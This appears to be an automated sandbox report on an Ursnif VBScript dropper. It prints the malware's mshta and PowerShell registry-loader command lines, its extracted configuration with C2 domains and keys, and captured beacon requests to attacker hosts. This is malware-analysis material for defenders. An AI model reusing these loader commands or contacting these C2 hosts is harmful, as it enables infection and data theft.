Loading ...

Play interactive tourEdit tour

Windows Analysis Report v8MaHZpVOY2L.vbs

Overview

General Information

Sample Name:v8MaHZpVOY2L.vbs
Analysis ID:458149
MD5:5d6eee678e2f66bef8885b3b3064db81
SHA1:4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
SHA256:9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 748 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 4576 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 484 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 2844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 5200 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4948 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 7 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Encoded IEXShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4260, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline', ProcessId: 4948
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4260

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9KAvira URL Cloud: Label: malware
            Source: http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/GAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 0000001C.00000003.600911240.0000000004280000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: gtr.antoinfer.comVirustotal: Detection: 12%Perma Link
            Source: app.flashgameo.atVirustotal: Detection: 11%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\beneficial.odtReversingLabs: Detection: 35%
            Multi AV Scanner detection for submitted fileShow sources
            Source: v8MaHZpVOY2L.vbsVirustotal: Detection: 34%Perma Link
            Source: v8MaHZpVOY2L.vbsReversingLabs: Detection: 13%
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
            Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49744 -> 185.228.233.17:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49745 -> 185.228.233.17:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49745 -> 185.228.233.17:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49746 -> 185.228.233.17:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 185.228.233.17:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80
            Source: Joe Sandbox ViewASN Name: ITOS-ASRU ITOS-ASRU
            Source: global trafficHTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
            Source: global trafficHTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
            Source: global trafficHTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
            Source: global trafficHTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
            Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
